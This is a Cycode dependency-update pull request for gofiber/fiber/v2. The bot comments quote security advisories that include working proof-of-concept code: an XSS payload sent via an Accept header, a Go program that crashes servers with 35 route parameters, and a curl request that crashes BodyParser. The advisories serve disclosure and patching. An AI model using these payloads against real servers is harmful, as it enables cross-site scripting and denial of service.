[Cycode] Fix for vulnerable manifest file dependency - github.com/gofiber/fiber/v2 updated to version 2.49.2

[cycode-security]

Cycode Vulnerable Dependencies Update

This pull request updates the following manifest file:

File Path	Number of packages to update
infrastructure/health-check/go.mod	1

📂 infrastructure/health-check/go.mod

1 package will be updated to resolve vulnerabilities:

Package Name	Current Version	Updated Version
github.com/gofiber/fiber/v2	2.32.0	2.49.2

[cycode-security]

❗Cycode: Security vulnerability found in newly introduced dependency.

Severity	Medium
Issue	Fiber vulnerable to XSS in AutoFormat Content Negotiation: CVE-2026-42554
Ecosystem	Go
Dependency	github.com/gofiber/fiber/v2
Dependency Paths	github.com/gofiber/fiber/v2 2.49.2
Direct Dependency	Yes
Upgrade	2.52.13

Summary

Description

A Cross-Site Scripting (CWE-79) vulnerability in Go Fiber allows a remote attacker to inject arbitrary HTML/JavaScript by supplying Accept: text/html on any request whose handler passes attacker-influenced data to the AutoFormat() feature. This affects github.com/gofiber/fiber/v3 (DefaultRes.AutoFormat) through version 3.1.0 and github.com/gofiber/fiber/v2 (Ctx.Format) through version 2.52.12.

The developer opts into content negotiation by calling AutoFormat(), but does not opt into raw HTML emission for a particular request; Fiber chooses that branch from attacker-controlled Accept. Five of the six branches of the same method already escape. JSON, XML, MsgPack, and CBOR all route through encoders that neutralize markup; the txt branch emits text/plain and cannot execute. The html branch is the sole outlier in a method whose name (AutoFormat) and symmetrical structure actively telegraph "safe, format-agnostic reply."

Details

The issue resides in res.go within (*DefaultRes).AutoFormat(). The method negotiates against the request Accept header, selects one of html | json | txt | xml | msgpack | cbor, and serializes the caller-supplied body accordingly.

The "html" branch concatenates the stringified body directly into HTML markup with no output encoding:

• accept comes from r.c.Accepts(...), i.e. is fully attacker-controlled. An attacker can force the "html" branch on any AutoFormat() call regardless of which format the developer tested against.
• b is produced from body via direct assignment (string / []byte) or fmt.Sprintf("%v", body). No html.EscapeString is applied.
• The resulting string is sent as text/html; charset=utf-8, so browsers render it as active HTML.

// res.go
func (r *DefaultRes) AutoFormat(body any) error {

    accept := r.c.DefaultReq.Accepts("html", "json", "txt", "xml", "msgpack", "cbor")

    r.Type(accept)
    var b string
    switch val := body.(type) {
    case string:
        b = val
    case []byte:
        b = r.c.app.toString(val)
    default:
        b = fmt.Sprintf("%v", val)
    }

    switch accept {
    case "txt":
        return r.SendString(b)
    case "json":
        return r.JSON(body)
    case "xml":
        return r.XML(body)
    case "html":
        return r.SendString("<p>" + b + "</p>")
    case "msgpack":
        return r.MsgPack(body)
    case "cbor":
        return r.CBOR(body)
    }
    return r.SendString(b)
}

Impact

This impacts all current v3 releases ≤ 3.1.0 containing DefaultRes.AutoFormat, and all current v2 releases ≤ 2.52.12 where the identical "<p>" + b + "</p>" construction exists in (*Ctx).Format(). Exploitation requires that an application call c.AutoFormat(v) where v (or a field stringified by %v) contains request-influenced data.

A handler that uses AutoFormat() to serve multiple representations of the same data can be turned into an HTML XSS sink when the client sends Accept: text/html, even if the developer only tested the JSON path.

This may result in:

• Reflected XSS in the application's origin via any request-derived value reaching AutoFormat.
• Stored XSS where the reflected value originates from persisted input later passed to AutoFormat.

Proposed Patch

The injection surface is r.Type("html") followed by r.SendString(b) with unescaped caller data, where it constructs markup on the caller's behalf around a value whose HTML-ness the caller did not declare. A few options:

• AutoFormat() should treat body as data, not markup, in the "html" branch and escape it before concatenating it into the framework-generated <p> wrapper. Callers that need raw negotiated HTML should use Format() with an explicit HTML handler.
• Introduce a sibling method that escapes, leave AutoFormat alone for backward compatibility.

HTML-escape the value in the "html" branch before concatenating it into the <p> wrapper.

import "html"

// ...
case "html":
    return r.SendString("<p>" + html.EscapeString(b) + "</p>")

html.EscapeString escapes <, >, &, ', ", which is sufficient for an element-text context. Apply the same change to v2's (*Ctx).Format().

Proof of Concept

# Create project directory
mkdir fiber-xss-poc && cd fiber-xss-poc

# Initialize Go module
go mod init fiber-xss-poc

# Install Fiber v3
go get github.com/gofiber/fiber/v3

# Create the PoC file
cat > main.go << 'EOF'
package main

import (
	"github.com/gofiber/fiber/v3"
)

type User struct {
	ID   int    `json:"id"`
	Name string `json:"name"`
}

func main() {
	app := fiber.New()
	
	app.Get("/api/user", func(c fiber.Ctx) error {
		user := User{
			ID:   1,
			Name: c.Query("name", "anonymous"),
		}
		return c.AutoFormat(user)
	})

	app.Listen(":3000")
}
EOF

# Run it
go run main.go
}

Benign JSON

curl -s 'http://127.0.0.1:3000/api/user?name=Alice' -H 'Accept: application/json'
{"id":1,"name":"Alice"}

HTML sink enables XSS

curl -s 'http://127.0.0.1:3000/api/user?name=<script>alert(document.domain)</script>' -H 'Accept: text/html'
<p>{1 <script>alert(document.domain)</script>}</p>

Description

Detects when new vulnerabilities affect your dependencies.

Tell us how you wish to proceed using one of the following commands:

Tag	Short Description
#cycode_ignore_manifest_here <reason>	Applies to this manifest in this request only
#cycode_ignore_package_everywhere <reason>	Applies to this manifest for this package for all requests in your repository
#cycode_ignore_package_here <reason>	Applies to this manifest for this package in this request only
#cycode_vulnerable_package_fix_this_violation	Fix this violation via a commit to this branch

⚠️ When commenting on Github, you may need to refresh the page to see the latest updates.

[cycode-security]

❗Cycode: Security vulnerability found in newly introduced dependency.

Severity	Medium
Issue	Fiber has a Denial of Service Vulnerability via Route Parameter Overflow: CVE-2026-25882
Ecosystem	Go
Dependency	github.com/gofiber/fiber/v2
Dependency Paths	github.com/gofiber/fiber/v2 2.49.2
Direct Dependency	Yes
Upgrade	2.52.12

A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching.

Affected Versions

• Fiber v3.0.0-rc.3 and earlier v3 releases
• Fiber v2.52.10 and potentially all v2 releases (confirmed exploitable)
• Both versions share the same vulnerable routing implementation

Vulnerability Details

Root Cause

Both Fiber v2 and v3 define a fixed-size parameter array in ctx.go:

const maxParams = 30

type DefaultCtx struct {
    values [maxParams]string  // Fixed 30-element array
    // ...
}

The router.go register() function accepts routes without validating parameter count. When a request matches a route exceeding 30 parameters, the code in path.go performs an unbounded write:

• v3: path.go:514
• v2: path.go:516

// path.go:514 - NO BOUNDS CHECKING
params[paramsIterator] = path[:i]

When paramsIterator >= 30, this triggers:

panic: runtime error: index out of range [30] with length 30

Attack Scenario

1. Application registers route with >30 parameters (e.g., via code or dynamic routing):

   app.Get("/api/:p1/:p2/:p3/.../p35", handler)

2. Attacker sends matching HTTP request:

   curl http://target/api/v1/v2/v3/.../v35

3. Server crashes during request processing with runtime panic

Proof of Concept

For Fiber v3

package main

import (
	"fmt"
	"net/http"
	"time"
	"github.com/gofiber/fiber/v3"
)

func main() {
	app := fiber.New()
	
	// Register route with 35 parameters (exceeds maxParams=30)
	path := "/test"
	for i := 1; i <= 35; i++ {
		path += fmt.Sprintf("/:p%d", i)
	}
	
	fmt.Printf("Registering route: %s...\n", path[:50]+"...")
	app.Get(path, func(c fiber.Ctx) error {
		return c.SendString("Never reached")
	})
	fmt.Println("✓ Registration succeeded (NO PANIC)")
	
	go func() {
		app.Listen(":9999")
	}()
	time.Sleep(200 * time.Millisecond)
	
	// Build exploit URL with 35 parameter values
	url := "http://localhost:9999/test"
	for i := 1; i <= 35; i++ {
		url += fmt.Sprintf("/v%d", i)
	}
	
	fmt.Println("\n🔴 Sending exploit request...")
	fmt.Println("Expected: panic at path.go:514 params[paramsIterator] = path[:i]\n")
	
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("✗ Request failed: %v\n", err)
		fmt.Println("💥 Server crashed!")
	} else {
		fmt.Printf("Response: %d\n", resp.StatusCode)
		resp.Body.Close()
	}
}

Output:

Registering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...
✓ Registration succeeded (NO PANIC)

🔴 Sending exploit request...
Expected: panic at path.go:514 params[paramsIterator] = path[:i]

panic: runtime error: index out of range [30] with length 30

goroutine 40 [running]:
github.com/gofiber/fiber/v3.(*routeParser).getMatch(...)
	/path/to/fiber/path.go:514
github.com/gofiber/fiber/v3.(*Route).match(...)
	/path/to/fiber/router.go:89
github.com/gofiber/fiber/v3.(*App).next(...)
	/path/to/fiber/router.go:142

For Fiber v2

package main

import (
	"fmt"
	"net/http"
	"time"
	"github.com/gofiber/fiber/v2"
)

func main() {
	app := fiber.New()
	
	// Register route with 35 parameters (exceeds maxParams=30)
	path := "/test"
	for i := 1; i <= 35; i++ {
		path += fmt.Sprintf("/:p%d", i)
	}
	
	fmt.Printf("Registering route: %s...\n", path[:50]+"...")
	app.Get(path, func(c *fiber.Ctx) error {
		return c.SendString("Never reached")
	})
	fmt.Println("✓ Registration succeeded (NO PANIC)")
	
	go func() {
		app.Listen(":9998")
	}()
	time.Sleep(200 * time.Millisecond)
	
	// Build exploit URL with 35 parameter values
	url := "http://localhost:9998/test"
	for i := 1; i <= 35; i++ {
		url += fmt.Sprintf("/v%d", i)
	}
	
	fmt.Println("\n🔴 Sending exploit request...")
	fmt.Println("Expected: panic at path.go:516 params[paramsIterator] = path[:i]\n")
	
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("✗ Request failed: %v\n", err)
		fmt.Println("💥 Server crashed!")
	} else {
		fmt.Printf("Response: %d\n", resp.StatusCode)
		resp.Body.Close()
	}
}

Output (v2):

Registering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...
✓ Registration succeeded (NO PANIC)

🔴 Sending exploit request...
Expected: panic at path.go:516 params[paramsIterator] = path[:i]

panic: runtime error: index out of range [30] with length 30

goroutine 40 [running]:
github.com/gofiber/fiber/v2.(*routeParser).getMatch(...)
	/path/to/fiber/v2@v2.52.10/path.go:512
github.com/gofiber/fiber/v2.(*Route).match(...)
	/path/to/fiber/v2@v2.52.10/router.go:84
github.com/gofiber/fiber/v2.(*App).next(...)
	/path/to/fiber/v2@v2.52.10/router.go:127

Impact

Exploitation Requirements

• No authentication required
• Single HTTP request triggers crash
• Trivially scriptable for sustained DoS
• Works against any route with >30 parameters

Real-World Impact

• Public APIs: Remote DoS attacks on vulnerable endpoints
• Microservices: Cascade failures if vulnerable service is critical
• Auto-scaling: Repeated crashes prevent proper recovery
• Monitoring: Log flooding and alert fatigue

Likelihood

HIGH - Exploitation requires only:

• Knowledge of route structure (often public in APIs)
• Standard HTTP client (curl, browser, etc.)
• Single malformed request

Workarounds

Until patched, users should:

1. Audit Routes: Ensure all routes have ≤30 parameters

   # Search for potential issues
   grep -r "/:.*/:.*/:.*" . | grep -v node_modules

2. Disable Dynamic Routing: If programmatically registering routes, validate parameter count:

   paramCount := strings.Count(route, ":")
   if paramCount > 30 {
       log.Fatal("Route exceeds maxParams")
   }

3. Rate Limiting: Deploy aggressive rate limiting to mitigate DoS impact

4. Monitoring: Alert on panic patterns in application logs

Timeline

• 2024-12-24: Vulnerability discovered in v3 during PR #3962 review
• 2024-12-25: Proof of concept confirmed exploitability in v3
• 2024-12-25: Vulnerability confirmed to also exist in v2 (same root cause)
• 2024-12-25: Security advisory created

References

• v3 Related PR: 🔥 feat: Implement OverrideParam override behavior for DefaultCtx gofiber/fiber#3962 (UpdateParam feature with defensive checks, doesn't fix root cause)
• Vulnerable Code Locations:
  • v3: path.go:514
  • v2: path.go:516

Credit

Discovered by: @sixcolors (Fiber maintainer) and @TheAspectDev

Description

Detects when new vulnerabilities affect your dependencies.

Tell us how you wish to proceed using one of the following commands:

Tag	Short Description
#cycode_ignore_manifest_here <reason>	Applies to this manifest in this request only
#cycode_ignore_package_everywhere <reason>	Applies to this manifest for this package for all requests in your repository
#cycode_ignore_package_here <reason>	Applies to this manifest for this package in this request only
#cycode_vulnerable_package_fix_this_violation	Fix this violation via a commit to this branch

⚠️ When commenting on Github, you may need to refresh the page to see the latest updates.

[cycode-security-eu]

❗Cycode: Security vulnerabilities found in newly introduced dependency.

Ecosystem	Go
Dependency	github.com/gofiber/fiber/v2
Dependency Paths	github.com/gofiber/fiber/v2 2.49.2
Direct Dependency	Yes

The following vulnerabilities were introduced:

GHSA	CVE	Severity	Fixed Version
GHSA-qjv7-627w-8qjv	CVE-2026-42554	MEDIUM	2.52.13
GHSA-mrq8-rjmw-wpq3	CVE-2026-25882	MEDIUM	2.52.12
GHSA-68rr-p4fp-j59v	CVE-2025-66630	CRITICAL	2.52.11
GHSA-qx2q-88mx-vhg7	CVE-2025-54801	HIGH	2.52.9
GHSA-98j2-3j3p-fw2v	CVE-2024-38513	CRITICAL	2.52.5
GHSA-fmg4-x8pw-hjhg	CVE-2024-25124	CRITICAL	2.52.1
GHSA-mv73-f69x-444p	CVE-2023-45141	HIGH	2.50.0
GHSA-94w9-97p3-p368	CVE-2023-45128	CRITICAL	2.50.0

Highest fixed version: 2.52.13

Description

Detects when new vulnerabilities affect your dependencies.

Tell us how you wish to proceed using one of the following commands:

Tag	Short Description
#cycode_ignore_package_everywhere <reason>	Applies to this manifest for this package for all requests in your repository
#cycode_ignore_manifest_here <reason>	Applies to this manifest in this request only
#cycode_ignore_package_here <reason>	Applies to this manifest for this package in this request only
#cycode_vulnerable_package_fix_this_violation	Fix this violation via a commit to this branch

⚠️ When commenting on Github, you may need to refresh the page to see the latest updates.

[cycode-security]

❗Cycode: Security vulnerability found in newly introduced dependency.

Severity	High
Issue	Fiber Crashes in BodyParser Due to Unvalidated Large Slice Index in Decoder: CVE-2025-54801
Ecosystem	Go
Dependency	github.com/gofiber/fiber/v2
Dependency Paths	github.com/gofiber/fiber/v2 2.49.2
Direct Dependency	Yes
Upgrade	2.52.9

Description

When using Fiber's Ctx.BodyParser to parse form data containing a large numeric key that represents a slice index (e.g., test.18446744073704), the application crashes due to an out-of-bounds slice allocation in the underlying schema decoder.

The root cause is that the decoder attempts to allocate a slice of length idx + 1 without validating whether the index is within a safe or reasonable range. If idx is excessively large, this leads to an integer overflow or memory exhaustion, causing a panic or crash.

Steps to Reproduce

Create a POST request handler that accepts x-www-form-urlencoded data

package main

import (
	"fmt"
	"net/http"

	"github.com/gofiber/fiber/v2"
)

type RequestBody struct {
	NestedContent []*struct{} `form:"test"`
}

func main() {
	app := fiber.New()

	app.Post("/", func(c *fiber.Ctx) error {
		formData := RequestBody{}
		if err := c.BodyParser(&formData); err != nil {
			fmt.Println(err)
			return c.SendStatus(http.StatusUnprocessableEntity)
		}
		return nil
	})

	fmt.Println(app.Listen(":3000"))
}

Run the server and send a POST request with a large numeric key in form data, such as:

curl -v -X POST localhost:3000 --data-raw 'test.18446744073704' \
  -H 'Content-Type: application/x-www-form-urlencoded'

Relevant Code Snippet

Within the decoder's decode method:

idx := parts[0].index
if v.IsNil() || v.Len() < idx+1 {
    value := reflect.MakeSlice(t, idx+1, idx+1)  // <-- Panic/crash occurs here when idx is huge
    if v.Len() < idx+1 {
        reflect.Copy(value, v)
    }
    v.Set(value)
}

The idx is not validated before use, leading to unsafe slice allocation for extremely large values.

---

Impact

• Application panic or crash on malicious or malformed input.
• Potential denial of service (DoS) via memory exhaustion or server crash.
• Lack of defensive checks in the parsing code causes instability.

Description

Detects when new vulnerabilities affect your dependencies.

Tell us how you wish to proceed using one of the following commands:

Tag	Short Description
#cycode_ignore_manifest_here <reason>	Applies to this manifest in this request only
#cycode_ignore_package_everywhere <reason>	Applies to this manifest for this package for all requests in your repository
#cycode_ignore_package_here <reason>	Applies to this manifest for this package in this request only
#cycode_vulnerable_package_fix_this_violation	Fix this violation via a commit to this branch

⚠️ When commenting on Github, you may need to refresh the page to see the latest updates.

[cycode-security]

❗Cycode: Security vulnerability found in newly introduced dependency.

Severity	Critical
Issue	Session Middleware Token Injection Vulnerability: CVE-2024-38513
Ecosystem	Go
Dependency	github.com/gofiber/fiber/v2
Dependency Paths	github.com/gofiber/fiber/v2 2.49.2
Direct Dependency	Yes
Upgrade	2.52.5

A security vulnerability has been identified in the Fiber session middleware where a user can supply their own session_id value, leading to the creation of a session with that key.

Impact

The identified vulnerability is a session middleware issue in GoFiber versions 2 and above. This vulnerability allows users to supply their own session_id value, resulting in the creation of a session with that key. If a website relies on the mere presence of a session for security purposes, this can lead to significant security risks, including unauthorized access and session fixation attacks. All users utilizing GoFiber's session middleware in the affected versions are impacted.

Patches

The issue has been addressed in the latest patch. Users are strongly encouraged to upgrade to version 2.52.5 or higher to mitigate this vulnerability.

Workarounds

Users who are unable to upgrade immediately can apply the following workarounds to reduce the risk:

1. Validate Session IDs: Implement additional validation to ensure session IDs are not supplied by the user and are securely generated by the server.
2. Session Management: Regularly rotate session IDs and enforce strict session expiration policies.

References

For more information on session best practices:

• OWASP Session Management Cheat Sheet

Users are encouraged to review these references and take immediate action to secure their applications.

Description

Detects when new vulnerabilities affect your dependencies.

Tell us how you wish to proceed using one of the following commands:

Tag	Short Description
#cycode_ignore_manifest_here <reason>	Applies to this manifest in this request only
#cycode_ignore_package_everywhere <reason>	Applies to this manifest for this package for all requests in your repository
#cycode_ignore_package_here <reason>	Applies to this manifest for this package in this request only
#cycode_vulnerable_package_fix_this_violation	Fix this violation via a commit to this branch

⚠️ When commenting on Github, you may need to refresh the page to see the latest updates.

[cycode-security]

❗Cycode: Security vulnerability found in newly introduced dependency.

Severity	Critical
Issue	Fiber has an insecure fallback in utils.UUIDv4() / utils.UUID() — predictable / zero‑UUID on crypto/rand failure: CVE-2025-66630
Ecosystem	Go
Dependency	github.com/gofiber/fiber/v2
Dependency Paths	github.com/gofiber/fiber/v2 2.49.2
Direct Dependency	Yes
Upgrade	2.52.11

Fiber v2 contains an internal vendored copy of gofiber/utils, and its functions UUIDv4() and UUID() inherit the same critical weakness described in the upstream advisory. On Go versions prior to 1.24, the underlying crypto/rand implementation can return an error if secure randomness cannot be obtained. In such cases, these Fiber v2 UUID functions silently fall back to generating predictable values — the all-zero UUID 00000000-0000-0000-0000-000000000000.

On Go 1.24+, the language guarantees that crypto/rand no longer returns an error (it will block or panic instead), so this vulnerability primarily affects Fiber v2 users running Go 1.23 or earlier, which Fiber v2 officially supports.

Because no error is returned by the Fiber v2 UUID functions, application code may unknowingly rely on predictable, repeated, or low-entropy identifiers in security-critical pathways. This is especially impactful because many Fiber v2 middleware components (session middleware, CSRF, rate limiting, request-ID generation, etc.) default to using utils.UUIDv4().

Impact includes, but is not limited to:

• Session fixation or hijacking (predictable session IDs)
• CSRF token forgery or bypass
• Authentication replay / token prediction
• Potential denial-of-service (DoS): if the zero UUID is generated, key-based structures (sessions, rate-limits, caches, CSRF stores) may collapse into a single shared key, causing overwrites, lock contention, or state corruption
• Request-ID collisions, undermining logging and trace integrity
• General compromise of confidentiality, integrity, and authorization logic relying on UUIDs for uniqueness or secrecy

All Fiber v2 versions containing the internal utils.UUIDv4() / utils.UUID() implementation are affected when running on Go <1.24. No patched Fiber v2 release currently exists.

---

Suggested Mitigations / Workarounds

Update to the latest version of Fiber v2.

---

Likelihood / Environmental Factors

It’s important to note that entropy exhaustion on modern Linux systems is extremely rare, as the kernel’s CSPRNG is resilient and non-blocking. However, entropy-source failures — where crypto/rand cannot read from its underlying provider — are significantly more likely in certain environments.

This includes containerized deployments, restricted sandboxes, misconfigured systems lacking read access to /dev/urandom or platform-equivalent sources, chrooted or jailed environments, embedded devices, or systems with non-standard or degraded randomness providers. On Go <1.24, such failures cause crypto/rand to return an error, which the Fiber v2 UUID functions currently treat as a signal to silently generate predictable UUIDs, including the zero UUID. This silent fallback is the root cause of the vulnerability.

---

References

• Upstream advisory for gofiber/utils: GHSA-m98w-cqp3-qcqr

• Source repositories:

  • github.com/gofiber/fiber
  • github.com/gofiber/utils

---

Credits / Reporter

Reported by @sixcolors (Fiber Maintainer / Security Team)

Description

Detects when new vulnerabilities affect your dependencies.

Tell us how you wish to proceed using one of the following commands:

Tag	Short Description
#cycode_ignore_manifest_here <reason>	Applies to this manifest in this request only
#cycode_ignore_package_everywhere <reason>	Applies to this manifest for this package for all requests in your repository
#cycode_ignore_package_here <reason>	Applies to this manifest for this package in this request only
#cycode_vulnerable_package_fix_this_violation	Fix this violation via a commit to this branch

⚠️ When commenting on Github, you may need to refresh the page to see the latest updates.

[cycode-security]

❗Cycode: Security vulnerability found in newly introduced dependency.

Severity	Critical
Issue	Fiber has Insecure CORS Configuration, Allowing Wildcard Origin with Credentials: CVE-2024-25124
Ecosystem	Go
Dependency	github.com/gofiber/fiber/v2
Dependency Paths	github.com/gofiber/fiber/v2 2.49.2
Direct Dependency	Yes
Upgrade	2.52.1

The CORS middleware allows for insecure configurations that could potentially expose the application to multiple CORS-related vulnerabilities. Specifically, it allows setting the Access-Control-Allow-Origin header to a wildcard ("*") while also having the Access-Control-Allow-Credentials set to true, which goes against recommended security best practices.

Impact

The impact of this misconfiguration is high as it can lead to unauthorized access to sensitive user data and expose the system to various types of attacks listed in the PortSwigger article linked in the references.

Proof of Concept

The code in cors.go allows setting a wildcard in the AllowOrigins while having AllowCredentials set to true, which could lead to various vulnerabilities.

Potential Solution

Here is a potential solution to ensure the CORS configuration is secure:

func New(config ...Config) fiber.Handler {
    if cfg.AllowCredentials && cfg.AllowOrigins == "*" {
        panic("[CORS] Insecure setup, 'AllowCredentials' is set to true, and 'AllowOrigins' is set to a wildcard.")
    }
    // Return new handler goes below
}

The middleware will not allow insecure configurations when using `AllowCredentials` and `AllowOrigins`.

Workarounds

For the meantime, users are advised to manually validate the CORS configurations in their implementation to ensure that they do not allow a wildcard origin when credentials are enabled. The browser fetch api, browsers and utilities that enforce CORS policies are not affected by this.

References

MDN Web Docs on CORS Errors
CodeQL on CORS Misconfiguration
PortSwigger on Exploiting CORS Misconfigurations
WhatWG CORS protocol and credentials

Description

Detects when new vulnerabilities affect your dependencies.

Tell us how you wish to proceed using one of the following commands:

Tag	Short Description
#cycode_ignore_manifest_here <reason>	Applies to this manifest in this request only
#cycode_ignore_package_everywhere <reason>	Applies to this manifest for this package for all requests in your repository
#cycode_ignore_package_here <reason>	Applies to this manifest for this package in this request only
#cycode_vulnerable_package_fix_this_violation	Fix this violation via a commit to this branch

⚠️ When commenting on Github, you may need to refresh the page to see the latest updates.

[cycode-security]

❗Cycode: Security vulnerability found in newly introduced dependency.

Severity	High
Issue	Go Fiber CSRF Token Validation Vulnerability: CVE-2023-45141
Ecosystem	Go
Dependency	github.com/gofiber/fiber/v2
Dependency Paths	github.com/gofiber/fiber/v2 2.49.2
Direct Dependency	Yes
Upgrade	2.50.0

A Cross-Site Request Forgery (CSRF) vulnerability has been identified in the application, which allows an attacker to obtain tokens and forge malicious requests on behalf of a user. This can lead to unauthorized actions being taken on the user's behalf, potentially compromising the security and integrity of the application.

Vulnerability Details

The vulnerability is caused by improper validation and enforcement of CSRF tokens within the application. The following issues were identified:

1. Lack of Token Association: The CSRF token was validated against tokens in storage but was not tied to the original requestor that generated it, allowing for token reuse.

Remediation

To remediate this vulnerability, it is recommended to take the following actions:

1. Update the Application: Upgrade the application to a fixed version with a patch for the vulnerability.

2. Implement Proper CSRF Protection: Review the updated documentation and ensure your application's CSRF protection mechanisms follow best practices.

3. Choose CSRF Protection Method: Select the appropriate CSRF protection method based on your application's requirements, either the Double Submit Cookie method or the Synchronizer Token Pattern using sessions.

4. Security Testing: Conduct a thorough security assessment, including penetration testing, to identify and address any other security vulnerabilities.

Defence-in-depth

Users should take additional security measures like captchas or Two-Factor Authentication (2FA) and set Session cookies with SameSite=Lax or SameSite=Strict, and the Secure and HttpOnly attributes.

Description

Detects when new vulnerabilities affect your dependencies.

Tell us how you wish to proceed using one of the following commands:

Tag	Short Description
#cycode_ignore_manifest_here <reason>	Applies to this manifest in this request only
#cycode_ignore_package_everywhere <reason>	Applies to this manifest for this package for all requests in your repository
#cycode_ignore_package_here <reason>	Applies to this manifest for this package in this request only
#cycode_vulnerable_package_fix_this_violation	Fix this violation via a commit to this branch

⚠️ When commenting on Github, you may need to refresh the page to see the latest updates.

[cycode-security]

❗Cycode: Security vulnerability found in newly introduced dependency.

Severity	Critical
Issue	CSRF Token Reuse Vulnerability: CVE-2023-45128
Ecosystem	Go
Dependency	github.com/gofiber/fiber/v2
Dependency Paths	github.com/gofiber/fiber/v2 2.49.2
Direct Dependency	Yes
Upgrade	2.50.0

A Cross-Site Request Forgery (CSRF) vulnerability has been identified in the application, which allows an attacker to inject arbitrary values and forge malicious requests on behalf of a user. This vulnerability can allow an attacker to inject arbitrary values without any authentication, or perform various malicious actions on behalf of an authenticated user, potentially compromising the security and integrity of the application.

Vulnerability Details

The vulnerability is caused by improper validation and enforcement of CSRF tokens within the application. The following issues were identified:

1. Token Injection: For 'safe' methods, the token was extracted from the cookie and saved to storage without further validation or sanitization.

2. Lack of Token Association: The CSRF token was validated against tokens in storage but not associated with a session, nor by using a Double Submit Cookie Method, allowing for token reuse.

Specific Go Packages Affected

github.com/gofiber/fiber/v2/middleware/csrf

Remediation

To remediate this vulnerability, it is recommended to take the following actions:

1. Update the Application: Upgrade the application to a fixed version with a patch for the vulnerability.

2. Implement Proper CSRF Protection: Review the updated documentation and ensure your application's CSRF protection mechanisms follow best practices.

3. Choose CSRF Protection Method: Select the appropriate CSRF protection method based on your application's requirements, either the Double Submit Cookie method or the Synchronizer Token Pattern using sessions.

4. Security Testing: Conduct a thorough security assessment, including penetration testing, to identify and address any other security vulnerabilities.

Defence-in-depth

Users should take additional security measures like captchas or Two-Factor Authentication (2FA) and set Session cookies with SameSite=Lax or SameSite=Secure, and the Secure and HttpOnly attributes.

Description

Detects when new vulnerabilities affect your dependencies.

Tell us how you wish to proceed using one of the following commands:

Tag	Short Description
#cycode_ignore_manifest_here <reason>	Applies to this manifest in this request only
#cycode_ignore_package_everywhere <reason>	Applies to this manifest for this package for all requests in your repository
#cycode_ignore_package_here <reason>	Applies to this manifest for this package in this request only
#cycode_vulnerable_package_fix_this_violation	Fix this violation via a commit to this branch

⚠️ When commenting on Github, you may need to refresh the page to see the latest updates.